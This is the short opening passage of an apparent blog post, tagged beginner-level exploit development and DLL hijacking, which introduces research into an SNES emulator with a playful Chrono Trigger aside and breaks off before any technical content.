Time: 30 mins Difficulty: Beginner Skills: Custom Exploit Development, DLL Hijacking 30 minute exploit dev post. Let's get it. I fell down another security research rabbit hole and when I snapped out of it, I found myself.... ...playing Chrono Trigger? Wait, what? That program in the picture is an SNES Emulator and, if you're like...